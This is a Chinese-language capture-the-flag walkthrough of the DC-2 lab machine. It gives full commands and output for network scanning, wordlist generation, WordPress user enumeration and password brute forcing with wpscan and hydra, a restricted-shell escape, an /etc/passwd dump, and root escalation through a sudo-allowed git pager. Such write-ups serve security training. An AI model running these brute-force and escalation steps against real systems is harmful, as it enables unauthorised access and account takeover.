DC-2

0x00.官网描述

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it’s designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven’t explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

0x01.上nmap

可以发现1为网关，2为宿主机，6为kali，那么4就是我们的受害者

root@JIYE:~/tmp/DC2# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 21:59 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0018s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00043s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.4
Host is up (0.00029s latency).
MAC Address: 00:0C:29:83:64:3E (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds
root@JIYE:~/tmp/DC2#

0x02.继续nmap扫描服务及端口

可以发现开放了80/7744端口，并且7744为ssh

root@JIYE:~/tmp/DC2# nmap -A 192.168.1.4 -p 1-65535 -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 22:05 EDT
Nmap scan report for 192.168.1.4
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:83:64:3E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.48 ms 192.168.1.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds
root@JIYE:~/tmp/DC2# 

0x03.发现80端口，直接访问

发现重定向到了dc-/且无法解析

0x04.修改hosts文件，进行本地解析

1.添加一行

192.168.1.4        dc-2

2.再次访问

3.发现网站cms是wordpress，并且也得到了flag1与其他提示

0x5.进行cewl

cewl根据指定url爬行，生成定制化的密码字典

root@JIYE:~/tmp/DC2# cewl dc-2 > pwd.dict
root@JIYE:~/tmp/DC2# wc -l pwd.dict 
239 pwd.dict
root@JIYE:~/tmp/DC2# 

0x06.扫描目录

由于是一个web application，所以进行一下目录扫描，本次使用msf，也可以使用dirb，gobuster

msf5 > use auxiliary/scanner/http/dir_scanner 
msf5 auxiliary(scanner/http/dir_scanner) > options 

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                                          Required  Description
   ----        ---------------                                          --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   PATH        /                                                        yes       The path  to identify files
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80                                                       yes       The target port (TCP)
   SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections
   THREADS     1                                                        yes       The number of concurrent threads (max one per host)
   VHOST                                                                no        HTTP server virtual host

msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.1.4
rhosts => 192.168.1.4
msf5 auxiliary(scanner/http/dir_scanner) > set threads 50
threads => 50
msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.1.4
[+] Found http://192.168.1.4:80/icons/ 404 (192.168.1.4)
[+] Found http://192.168.1.4:80/wp-includes/ 404 (192.168.1.4)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

可以发现wp-includes目录，访问一下，可以发现文件目录，然而并没有什么有用的信息，还得dirb

dirb扫描发现wp-admin，尝试打开

root@JIYE:~/tmp/DC2# dirb http://dc-2

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Aug 21 01:08:03 2020
URL_BASE: http://dc-2/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://dc-2/ ----
+ http://dc-2/index.php (CODE:301|SIZE:0)                                         
+ http://dc-2/server-status (CODE:403|SIZE:292)                                     
==> DIRECTORY: http://dc-2/wp-admin/                                                 
==> DIRECTORY: http://dc-2/wp-content/                                              
==> DIRECTORY: http://dc-2/wp-includes/                                             
+ http://dc-2/xmlrpc.php (CODE:405|SIZE:42)                                         
---- Entering directory: http://dc-2/wp-admin/ ----
+ http://dc-2/wp-admin/admin.php (CODE:302|SIZE:0)                                   
==> DIRECTORY: http://dc-2/wp-admin/css/                                             
==> DIRECTORY: http://dc-2/wp-admin/images/                                         
==> DIRECTORY: http://dc-2/wp-admin/includes/                                       
+ http://dc-2/wp-admin/index.php (CODE:302|SIZE:0)                                   
==> DIRECTORY: http://dc-2/wp-admin/js/                                             
==> DIRECTORY: http://dc-2/wp-admin/maint/                                           
==> DIRECTORY: http://dc-2/wp-admin/network/                                         
==> DIRECTORY: http://dc-2/wp-admin/user/                                           
---- Entering directory: http://dc-2/wp-content/ ----
+ http://dc-2/wp-content/index.php (CODE:200|SIZE:0)                                 
==> DIRECTORY: http://dc-2/wp-content/languages/                                     
==> DIRECTORY: http://dc-2/wp-content/plugins/                                       
==> DIRECTORY: http://dc-2/wp-content/themes/                                       
---- Entering directory: http://dc-2/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-admin/network/ ----
+ http://dc-2/wp-admin/network/admin.php (CODE:302|SIZE:0)                           
+ http://dc-2/wp-admin/network/index.php (CODE:302|SIZE:0)                           
---- Entering directory: http://dc-2/wp-admin/user/ ----
+ http://dc-2/wp-admin/user/admin.php (CODE:302|SIZE:0)                             
+ http://dc-2/wp-admin/user/index.php (CODE:302|SIZE:0)                             
---- Entering directory: http://dc-2/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://dc-2/wp-content/plugins/ ----
+ http://dc-2/wp-content/plugins/index.php (CODE:200|SIZE:0)                         
---- Entering directory: http://dc-2/wp-content/themes/ ----
+ http://dc-2/wp-content/themes/index.php (CODE:200|SIZE:0)                         
-----------------
END_TIME: Fri Aug 21 01:08:24 2020
DOWNLOADED: 32284 - FOUND: 12
root@JIYE:~/tmp/DC2# 

可以发现重定向到了wp-login.php

由于是wordpress cms，所以可以使用wpscan

0x07.wpscan扫描

扫描存在的用户

root@JIYE:~/tmp/DC2# wpscan --url dc-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.1.4]
[+] Started: Fri Aug 21 00:37:54 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-08-11T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.4
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri Aug 21 00:37:57 2020
[+] Requests Done: 27
[+] Cached Requests: 34
[+] Data Sent: 6.255 KB
[+] Data Received: 230.303 KB
[+] Memory used: 159.527 MB
[+] Elapsed time: 00:00:02
root@JIYE:~/tmp/DC2# 

找到admin,jerry,tom三个用户

密码字典前面已经生成，下面创建用户名字典

root@JIYE:~/tmp/DC2# cat users.dict 
admin
jerry
tom
root@JIYE:~/tmp/DC2# 

使用wpscan爆破，也可以用bp

发现了jerry与tom的密码

root@JIYE:~/tmp/DC2# wpscan --url dc-2 -U users.dict -P pwd.dict 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.4
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri Aug 21 01:19:20 2020
[+] Requests Done: 702
[+] Cached Requests: 5
[+] Data Sent: 319.78 KB
[+] Data Received: 684.152 KB
[+] Memory used: 209.777 MB
[+] Elapsed time: 00:00:44
root@JIYE:~/tmp/DC2# 

下面先尝试tom登入网站，成功登入

手动爬虫没有发现flag，flag1提示：如果找不到请以其他身份登入，下面使用jerry登入

发现flag2，与提示

根据提示希望我找到另一个入口，前面发现开放了ssh，所以下面爆破ssh

0x08.爆破ssh

密码竟然与web密码一样，那我还爆破个🔨！

root@JIYE:~/tmp/DC2# hydra -L users.dict -P pwd.dict ssh://192.168.1.4 -s 7744 -f -vV -o hydra.ssh
......
......
[ATTEMPT] target 192.168.1.4 - login "tom" - pass "penatibus" - 683 of 720 [child 3] (0/3)
[ATTEMPT] target 192.168.1.4 - login "tom" - pass "magnis" - 684 of 720 [child 12] (0/3)
[ATTEMPT] target 192.168.1.4 - login "tom" - pass "dis" - 685 of 720 [child 13] (0/3)
[ATTEMPT] target 192.168.1.4 - login "tom" - pass "parturient" - 686 of 720 [child 8] (0/3)
[7744][ssh] host: 192.168.1.4   login: tom   password: parturient
[STATUS] attack finished for 192.168.1.4 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-21 01:47:28
root@JIYE:~/tmp/DC2

0x09.ssh登入

root@JIYE:~/tmp/DC2# ssh tom@192.168.1.4 -p 7744 
The authenticity of host '[192.168.1.4]:7744 ([192.168.1.4]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.1.4]:7744' (ECDSA) to the list of known hosts.
tom@192.168.1.4's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ 

发现flag3.txt，查看发现有rbash限制

tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

0x10.rbash绕过

BASH_CMDS[a]=/bin/sh;a
/bin/bash

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ /bin/bash
tom@DC-2:~$ echo $0
/bin/bash
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt 
bash: cat: command not found
tom@DC-2:~$ 

这回为bash: cat: command not foun，下面导入环境变量

export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin

查看到flag3

tom@DC-2:~$ export PATH=$PATH:/bin
tom@DC-2:~$ export PATH=$PATH:/usr/bin
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt 
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
tom@DC-2:~$

可怜的老汤姆总是追赶杰瑞。也许他应该为自己造成的压力感到难过。

线索指向jerry用户

查看/etc/passwd，发现jerry，为/bin/bash可以登入

tom@DC-2:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
tom:x:1001:1001:Tom Cat,,,:/home/tom:/bin/rbash
jerry:x:1002:1002:Jerry Mouse,,,:/home/jerry:/bin/bash
tom@DC-2:~$ 

0x11.jerry登入

由于前面的tom用户的登入密码与web application密码相同，下面尝试jerry的

果然是可以的

tom@DC-2:~$ su jerry
Password: 
jerry@DC-2:/home/tom$

进入到用户家目录发现flag4

jerry@DC-2:/home/tom$ cd 
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt 
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

jerry@DC-2:~$

很高兴看到你已经走了这么远，但你还没回家。

你仍然需要得到最后的标志（唯一真正重要的标志！！！）。

这里没有提示-你现在只能靠自己了。:-)

去吧-离开这里！！！！

尝试进入/root，没有权限

jerry@DC-2:~$ cd /root
bash: cd: /root: Permission denied
jerry@DC-2:~$

根据提示信息，使用git进行提权

sudo -l，发现git命令在/usr/bin/git下，此命令在以sudo命令运行时具有root权限，且不需要密码

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$

尝试sudo git，发现是可以调用的

jerry@DC-2:~$ sudo git
usage: git [--version] [--help] [-C <path>] [-c name=value]
           [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
           [-p|--paginate|--no-pager] [--no-replace-objects] [--bare]
           [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
           <command> [<args>]

The most commonly used git commands are:
   add        Add file contents to the index
   bisect     Find by binary search the change that introduced a bug
   branch     List, create, or delete branches
   checkout   Checkout a branch or paths to the working tree
   clone      Clone a repository into a new directory
   commit     Record changes to the repository
   diff       Show changes between commits, commit and working tree, etc
   fetch      Download objects and refs from another repository
   grep       Print lines matching a pattern
   init       Create an empty Git repository or reinitialize an existing one
   log        Show commit logs
   merge      Join two or more development histories together
   mv         Move or rename a file, a directory, or a symlink
   pull       Fetch from and integrate with another repository or a local branch
   push       Update remote refs along with associated objects
   rebase     Forward-port local commits to the updated upstream head
   reset      Reset current HEAD to the specified state
   rm         Remove files from the working tree and from the index
   show       Show various types of objects
   status     Show the working tree status
   tag        Create, list, delete or verify a tag object signed with GPG

'git help -a' and 'git help -g' lists available subcommands and some
concept guides. See 'git help <command>' or 'git help <concept>'
to read about a specific subcommand or concept.
jerry@DC-2:~$ 

0x12.提权

强制进入交互页面

jerry@DC-2:~$ sudo git -p --help config
GIT-CONFIG(1)                                                                 Git Manual                                                                 GIT-CONFIG(1)



NAME
       git-config - Get and set repository or global options

SYNOPSIS
       git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
       git config [<file-option>] [type] --add name value
       git config [<file-option>] [type] --replace-all name value [value_regex]
       git config [<file-option>] [type] [-z|--null] --get name [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
       git config [<file-option>] --unset name [value_regex]
       git config [<file-option>] --unset-all name [value_regex]
       git config [<file-option>] --rename-section old_name new_name
       git config [<file-option>] --remove-section name
       git config [<file-option>] [-z|--null] -l | --list
       git config [<file-option>] --get-color name [default]
       git config [<file-option>] -e | --edit


DESCRIPTION
       You can query/set/replace/unset options with this command. The name is actually the section and the key separated by a dot, and the value will be escaped.

       Multiple lines can be added to an option by using the --add option. If you want to update or unset an option which can occur on multiple lines, a POSIX regexp
       value_regex needs to be given. Only the existing values that match the regexp are updated or unset. If you want to handle the lines that do not match the
       regex, just prepend a single exclamation mark in front (see also the section called “EXAMPLES”).

       The type specifier can be either --int or --bool, to make git config ensure that the variable(s) are of the given type and convert the value to the canonical
       form (simple decimal number for int, a "true" or "false" string for bool), or --path, which does some path expansion (see --path below). If no type specifier
       is passed, no checks or transformations are performed on the value.

       When reading, the values are read from the system, global and repository local configuration files by default, and options --system, --global, --local and
:

执行!/bin/bash

!/bin/bash
root@DC-2:/home/jerry# cd /root
root@DC-2:~# whoami
root
root@DC-2:~# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt 
ual                                                                 GIT-CONFIG(1)












egex]








 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@DC-2:~#